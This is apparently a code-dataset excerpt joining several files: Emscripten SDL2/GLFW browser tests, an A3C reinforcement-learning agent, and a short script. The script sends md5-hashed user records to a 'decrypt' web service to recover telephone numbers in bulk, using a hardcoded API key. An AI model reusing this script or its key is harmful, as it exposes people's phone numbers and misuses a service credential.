    os.mkdir('sub')
    # Move the generated assets into sub/ so only a working locateFile can find them.
    shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
    shutil.move('test.data', os.path.join('sub', 'test.data'))
    self.run_browser('page.html', None, '/report_result?1')
def test_glfw3(self):
    """Basic GLFW3 support under legacy GL emulation."""
    self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3'], expected='1')
def test_glfw3_events(self):
    """GLFW3 event handling under legacy GL emulation."""
    self.btest(path_from_root('tests', 'glfw3_events.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3'], expected='1')
def test_asm_swapping(self):
    """SWAPPABLE_ASM_MODULE: hot-swap the asm module at runtime and verify both the
    initial and the swapped-in implementations are executed."""
    self.clear()
    open('run.js', 'w').write(r'''
Module['_main'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
    for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
        print opts
        open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
        Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
        # distill_asm extracts just the swappable asm module from the full build
        Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
        assert os.path.exists('second.js')
        out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
        self.validate_asmjs(out)
        self.btest(path_from_root('tests', 'asm_swap.cpp'), args=['-s', 'SWAPPABLE_ASM_MODULE=1', '-s', 'NO_EXIT_RUNTIME=1', '--pre-js', 'run.js'] + opts, expected='999')
def test_sdl2_image(self):
    # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
    open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
    # Cover both memory-init modes and both plain and @-mapped preload destinations.
    for mem in [0, 1]:
        for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
                                        ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
            Popen([
                PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
                '--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'
            ]).communicate()
            self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
    """SDL2_image decoding a JPEG loaded via --preload-file."""
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
    open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
    Popen([
        PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
        '--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'
    ]).communicate()
    self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_key(self):
    """SDL2 key events driven by synthetic keydown/keyup DOM events from pre.js."""
    for defines in [[]]:
        open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
        open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
        Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
        self.run_browser('page.html', '', '/report_result?7436429')
def test_sdl2_text(self):
    """SDL2 text input driven by synthetic keypress DOM events from pre.js."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
    open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
    """SDL2 mouse events via synthetic DOM MouseEvents dispatched at the canvas."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
    self.run_browser('page.html', '', '/report_result?712')
def test_sdl2_mouse_offsets(self):
    """SDL2 mouse coordinates when the canvas is offset inside the page; uses a custom
    HTML shell that positions the canvas at a 5px offset."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
    open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
    self.run_browser('page.html', '', '/report_result?572')
def test_sdl2glshader(self):
    """SDL2 + GL shaders against a reference image, with and without closure."""
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
    """Blank SDL2 canvas matches the reference image."""
    self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
    """Palettised SDL2 canvas rendering matches the reference image."""
    self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
    """Creating the SDL2 canvas twice still renders correctly."""
    self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
    # 'zzz' prefix disables this test from the normal run order.
    self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
    """Palettised canvas rendering selected by -r/-g/-b command-line argument."""
    open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
    open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
    open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
    """SDL2 software-surface creation."""
    self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_compressed(self):
    """SDL2_image loading assets packaged with LZMA --compression; the original asset is
    renamed away so only the compressed copy can satisfy the load."""
    for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
                         (path_from_root('tests', 'screenshot.jpg'), 600)]:
        self.clear()
        print image
        basename = os.path.basename(image)
        shutil.copyfile(image, os.path.join(self.get_dir(), basename))
        open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
        self.build_native_lzma()
        Popen([
            PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html',
            '--preload-file', basename, '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2',
            '--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
                                           path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
                                           'LZMA.decompress')
        ]).communicate()
        shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound');
        self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl2_image_prepare(self):
    # load an image file, get pixel data.
    # The .not extension forces the prepare path rather than extension-based decoding.
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
    self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_canvas_proxy(self):
    """SDL2 rendering from a worker via --proxy-to-worker; the post-build hook injects a
    reftest that runs after the proxied frames arrive."""
    def post():
        # Splice the reftest harness into the generated page before </body>.
        html = open('test.html').read()
        html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 1000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
        open('test.html', 'w').write(html)
    open('data.txt', 'w').write('datum')
    self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
    # key events should be detected using SDL_PumpEvents
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
    self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
    """SDL2 canvas size querying."""
    self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_read(self):
    # SDL, OpenGL, readPixels
    open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
    self.run_browser('something.html', '.', '/report_result?1')
def test_sdl2_fog_simple(self):
    """GL fog (simple mode) under SDL2 and legacy GL emulation, against a reference image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
               message='You should see an image with fog.')
def test_sdl2_fog_negative(self):
    """GL fog with negative start under SDL2 and legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
               message='You should see an image with fog.')
def test_sdl2_fog_density(self):
    """GL fog density mode under SDL2 and legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
               message='You should see an image with fog.')
def test_sdl2_fog_exp2(self):
    """GL fog EXP2 mode under SDL2 and legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
               message='You should see an image with fog.')
def test_sdl2_fog_linear(self):
    """GL fog LINEAR mode under SDL2 and legacy GL emulation (1px reference slack)."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
               message='You should see an image with fog.')
|
A3C.py | import copy
import random
import time
import numpy as np
import torch
from torch import multiprocessing
from torch.multiprocessing import Queue
from torch.optim import Adam
from agents.Base_Agent import Base_Agent
from utilities.Utility_Functions import create_actor_distribution, SharedAdam
class A3C(Base_Agent):
    """Actor critic A3C algorithm from deepmind paper https://arxiv.org/pdf/1602.01783.pdf

    Spawns worker processes that each play episodes with a local copy of the
    network and push gradients onto a queue; a separate optimizer process
    applies those gradients to the shared model.
    """
    agent_name = "A3C"
    def __init__(self, config, agent_name_=agent_name):
        super(A3C, self).__init__(config, agent_name_=agent_name_)
        # Reserve capacity: one process applies gradients, the rest are workers
        # (at least one worker even on tiny machines).
        self.num_processes = multiprocessing.cpu_count()
        self.worker_processes = max(1, self.num_processes - 2)
        # Single network: action_size actor outputs plus one critic (state-value) output.
        self.actor_critic = self.create_NN(input_dim=self.state_size, output_dim=[self.action_size, 1])
        # SharedAdam keeps optimizer state in shared memory so all processes see it.
        self.actor_critic_optimizer = SharedAdam(self.actor_critic.parameters(), lr=self.hyperparameters["learning_rate"], eps=1e-4)
        self.wandb_watch(self.actor_critic, log_freq=self.config.wandb_model_log_freq)
    def run_n_episodes(self):
        """Runs game to completion n times and then summarises results and saves model (if asked to)"""
        start = time.time()
        results_queue = Queue()
        gradient_updates_queue = Queue()
        # Shared episode counter ('i' = signed int) incremented by workers.
        episode_number = multiprocessing.Value('i', 0)
        self.optimizer_lock = multiprocessing.Lock()
        episodes_per_process = int(self.config.num_episodes_to_run / self.worker_processes) + 1
        processes = []
        # Move model and optimizer state into shared memory before forking.
        self.actor_critic.share_memory()
        self.actor_critic_optimizer.share_memory()
        optimizer_worker = multiprocessing.Process(target=self.update_shared_model, args=(gradient_updates_queue,))
        optimizer_worker.start()
        for process_num in range(self.worker_processes):
            worker = Actor_Critic_Worker(process_num, copy.deepcopy(self.environment), self.actor_critic, episode_number, self.optimizer_lock,
                                         self.actor_critic_optimizer, self.config, episodes_per_process,
                                         self.hyperparameters["epsilon_decay_rate_denominator"],
                                         self.action_size, self.action_types,
                                         results_queue, copy.deepcopy(self.actor_critic), gradient_updates_queue)
            worker.start()
            processes.append(worker)
        # Blocks in the parent, draining results until enough episodes have run.
        self.print_results(episode_number, results_queue)
        for worker in processes:
            worker.join()
        # NOTE(review): Process.kill() requires Python 3.7+; the optimizer loop
        # has no sentinel, so it is terminated forcibly here.
        optimizer_worker.kill()
        time_taken = time.time() - start
        return self.game_full_episode_scores, self.rolling_results, time_taken
    def print_results(self, episode_number, results_queue):
        """Worker that prints out results as they get put into a queue"""
        # Busy-polls the queue; exits once the shared episode counter reaches the target.
        while True:
            with episode_number.get_lock():
                carry_on = episode_number.value < self.config.num_episodes_to_run
            if carry_on:
                if not results_queue.empty():
                    self.total_episode_score_so_far = results_queue.get()
                    self.save_and_print_result()
            else: break
    def update_shared_model(self, gradient_updates_queue):
        """Worker that updates the shared model with gradients as they get put into the queue"""
        # Runs forever in its own process; killed by run_n_episodes when done.
        while True:
            gradients = gradient_updates_queue.get()
            with self.optimizer_lock:
                self.actor_critic_optimizer.zero_grad()
                # Install worker-computed gradients directly onto the shared parameters.
                for grads, params in zip(gradients, self.actor_critic.parameters()):
                    params._grad = grads # maybe need to do grads.clone()
                self.actor_critic_optimizer.step()
class Actor_Critic_Worker(torch.multiprocessing.Process):
"""Actor critic worker that will play the game for the designated number of episodes """
def __init__(self, worker_num, environment, shared_model, counter, optimizer_lock, shared_optimizer,
config, episodes_to_run, epsilon_decay_denominator, action_size, action_types, results_queue,
local_model, gradient_updates_queue):
super(Actor_Critic_Worker, self).__init__()
self.environment = environment
self.config = config
self.worker_num = worker_num
self.gradient_clipping_norm = self.config.hyperparameters["gradient_clipping_norm"]
self.discount_rate = self.config.hyperparameters["discount_rate"]
self.normalise_rewards = self.config.hyperparameters["normalise_rewards"]
self.action_size = action_size
self.set_seeds(self.worker_num)
self.shared_model = shared_model
self.local_model = local_model
self.local_optimizer = Adam(self.local_model.parameters(), lr=0.0, eps=1e-4)
self.counter = counter
self.optimizer_lock = optimizer_lock
self.shared_optimizer = shared_optimizer
self.episodes_to_run = episodes_to_run
self.epsilon_decay_denominator = epsilon_decay_denominator
self.exploration_worker_difference = self.config.hyperparameters["exploration_worker_difference"]
self.action_types = action_types
self.results_queue = results_queue
self.episode_number = 0
self.gradient_updates_queue = gradient_updates_queue
def set_seeds(self, worker_num):
"""Sets random seeds for this worker"""
torch.manual_seed(self.config.seed + worker_num)
self.environment.seed(self.config.seed + worker_num)
def run(self):
"""Starts the worker"""
torch.set_num_threads(1)
for ep_ix in range(self.episodes_to_run):
with self.optimizer_lock:
Base_Agent.copy_model_over(self.shared_model, self.local_model)
epsilon_exploration = self.calculate_new_exploration()
state = self.reset_game_for_worker()
done = False
self.episode_states = []
self.episode_actions = []
self.episode_rewards = []
self.episode_log_action_probabilities = []
self.critic_outputs = []
while not done:
action, action_log_prob, critic_outputs = self.pick_action_and_get_critic_values(self.local_model, state, epsilon_exploration)
next_state, reward, done, _ = self.environment.step(action)
self.episode_states.append(state)
self.episode_actions.append(action)
self.episode_rewards.append(reward)
self.episode_log_action_probabilities.append(action_log_prob)
self.critic_outputs.append(critic_outputs)
state = next_state
total_loss = self.calculate_total_loss()
self.put_gradients_in_queue(total_loss)
self.episode_number += 1
with self.counter.get_lock():
self.counter.value += 1
self.results_queue.put(np.sum(self.episode_rewards))
def calculate_new_exploration(self):
"""Calculates the new exploration parameter epsilon. It picks a random point within 3X above and below the
current epsilon"""
with self.counter.get_lock():
epsilon = 1.0 / (1.0 + (self.counter.value / self.epsilon_decay_denominator))
epsilon = max(0.0, random.uniform(epsilon / self.exploration_worker_difference, epsilon * self.exploration_worker_difference))
return epsilon
def reset_game_for_worker(self):
"""Resets the game environment so it is ready to play a new episode"""
state = self.environment.reset()
if self.action_types == "CONTINUOUS": self.noise.reset()
return state
def pick_action_and_get_critic_values(self, policy, state, epsilon_exploration=None):
"""Picks an action using the policy"""
state = torch.from_numpy(state).float().unsqueeze(0)
model_output = policy.forward(state)
actor_output = model_output[:, list(range(self.action_size))] #we only use first set of columns to decide action, last column is state-value
critic_output = model_output[:, -1]
action_distribution = create_actor_distribution(self.action_types, actor_output, self.action_size)
action = action_distribution.sample().cpu().numpy()
if self.action_types == "CONTINUOUS": action += self.noise.sample()
if self.action_types == "DISCRETE":
if random.random() <= epsilon_exploration:
action = random.randint(0, self.action_size - 1)
else:
action = action[0]
action_log_prob = self.calculate_log_action_probability(action, action_distribution)
return action, action_log_prob, critic_output
def calculate_log_action_probability(self, actions, action_distribution):
"""Calculates the log probability of the chosen action"""
policy_distribution_log_prob = action_distribution.log_prob(torch.Tensor([actions]))
return policy_distribution_log_prob
def calculate_total_loss(self):
"""Calculates the actor loss + critic loss"""
discounted_returns = self.calculate_discounted_returns()
if self.normalise_rewards:
discounted_returns = self.normalise_discounted_returns(discounted_returns)
critic_loss, advantages = self.calculate_critic_loss_and_advantages(discounted_returns)
actor_loss = self.calculate_actor_loss(advantages)
total_loss = actor_loss + critic_loss
return total_loss
def calculate_discounted_returns(self):
"""Calculates the cumulative discounted return for an episode which we will then use in a learning iteration"""
discounted_returns = [0]
for ix in range(len(self.episode_states)):
return_value = self.episode_rewards[-(ix + 1)] + self.discount_rate*discounted_returns[-1]
discounted_returns.append(return_value)
discounted_returns = discounted_returns[1:]
discounted_returns = discounted_returns[::-1]
return discounted_returns
def normalise_discounted_returns(self, discounted_returns):
"""Normalises the discounted returns by dividing by mean and std of returns that episode"""
mean = np.mean(discounted_returns)
std = np.std(discounted_returns)
discounted_returns -= mean
discounted_returns /= (std + 1e-5)
return discounted_returns
def calculate_critic_loss_and_advantages(self, all_discounted_returns):
    """Return (critic MSE loss, detached advantages) for the episode."""
    targets = torch.Tensor(all_discounted_returns)
    values = torch.cat(self.critic_outputs)
    errors = targets - values
    # Detach so actor gradients do not flow back into the critic head.
    advantages = errors.detach()
    critic_loss = (errors ** 2).mean()
    return critic_loss, advantages
def calculate_actor_loss(self, advantages):
    """Policy-gradient loss: negative mean of advantage-weighted log-probabilities."""
    log_probs = torch.cat(self.episode_log_action_probabilities)
    return (-1.0 * log_probs * advantages).mean()
def put_gradients_in_queue(self, total_loss):
    """Backpropagate *total_loss* and enqueue clipped gradient copies for the shared-model optimiser."""
    self.local_optimizer.zero_grad()
    total_loss.backward()
    torch.nn.utils.clip_grad_norm_(self.local_model.parameters(), self.gradient_clipping_norm)
    gradients = []
    for param in self.local_model.parameters():
        # Clone so later local updates cannot mutate the queued tensors.
        gradients.append(param.grad.clone())
    self.gradient_updates_queue.put(gradients)
|
multithread.py | import json
import csv
import time
import requests
import queue
import threading
file_root_path = '.'
file_name1 = 'dwa_d_ia_s_user_prod_0716u8.txt.csv'
file_name2 = 'dwa_d_ia_s_user_prod_transcoded.txt.csv'
def time_it(fun):
    """Decorator: print how long each call to *fun* takes, passing its return value through.

    Fixes: the wrapper now uses functools.wraps (so the decorated function keeps
    its name/docstring), the parameters are named *args/**kwargs instead of the
    misleading *argc/**argv, and the report prints the function's name rather
    than its raw repr.
    """
    from functools import wraps

    @wraps(fun)
    def inner_fun(*args, **kwargs):
        st = time.time()
        ret = fun(*args, **kwargs)
        et = time.time()
        print(f"{fun.__name__} cost {et-st}")
        return ret
    return inner_fun
def load_data(f1):
    """Read CSV file *f1* (relative to file_root_path) and return its non-empty rows."""
    path = f'{file_root_path}/{f1}'
    with open(path, 'r', encoding='utf8') as fh:
        return [row for row in csv.reader(fh) if row]
def writer(q, f1):
    """Consumer thread: drain rows from queue *q* into '<f1>_tel.csv' until a None sentinel.

    Fix: the output file is opened with a context manager so it is closed (and
    flushed) even if writing raises; the original open()/close() pair leaked
    the handle on any exception.
    """
    with open(f"{file_root_path}/{f1}_tel.csv", 'w', encoding='utf8', newline='') as wh:
        csv_writer = csv.writer(wh)
        while True:
            d = q.get()
            if d is None:  # sentinel posted by the producer when all rows are done
                break
            csv_writer.writerow(d)
def get_one(ep, q):
    """Resolve the md5 hash in row *ep* via the decrypt service, append the
    resulting telephone number to the row, and put the row on queue *q*.

    Fixes: requests.get now carries a timeout so a hung connection cannot
    stall a worker thread forever, and the result is appended to the row
    exactly once — the original appended a falsy result on every failed
    retry, growing the row by up to 10 junk cells.
    """
    md5 = ep[0]
    url = "http://decrypt.dianhua.cn/decrypt/?apikey=yuloreInner&country=86&uid=yulore&app=decryptTel&ver=1.0&v=1&h=1&tel=%s" % md5
    retry = 10
    ret = None
    while retry:
        try:
            resp = requests.get(url, timeout=10)  # bound the wait per attempt
            if resp.status_code == 200:
                ret = json.loads(resp.text)['telNum']
                if ret:
                    break
        except Exception as e:  # best-effort: report and retry
            print(e)
        retry -= 1
    ep.append(ret)
    q.put(ep)
def main(q, f1):
    """Producer: spawn one worker thread per input row (at most 10 alive at a
    time), wait for all workers, then post the None sentinel for the writer."""
    rows = load_data(f1)
    print("len: %d" % len(rows))
    workers = []
    for count, row in enumerate(rows, start=1):
        print(count)
        worker = threading.Thread(target=get_one, args=(row, q))
        worker.start()
        workers.append(worker)
        # Throttle: block until fewer than 10 workers are still running.
        while len(workers) >= 10:
            time.sleep(1)
            workers = [w for w in workers if w.is_alive()]
    # Drain the remaining workers before telling the writer to finish.
    while len(workers):
        time.sleep(1)
        workers = [w for w in workers if w.is_alive()]
    q.put(None)
@time_it
def deal(f1):
    """Process one input file: start the writer thread, run the producer, then wait for the writer."""
    row_queue = queue.Queue()
    writer_thread = threading.Thread(target=writer, args=(row_queue, f1))
    writer_thread.start()
    main(row_queue, f1)
    writer_thread.join()
    print('done')
# Entry point: resolve both input files sequentially.
if __name__ == '__main__':
    deal(file_name1)
    deal(file_name2)
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
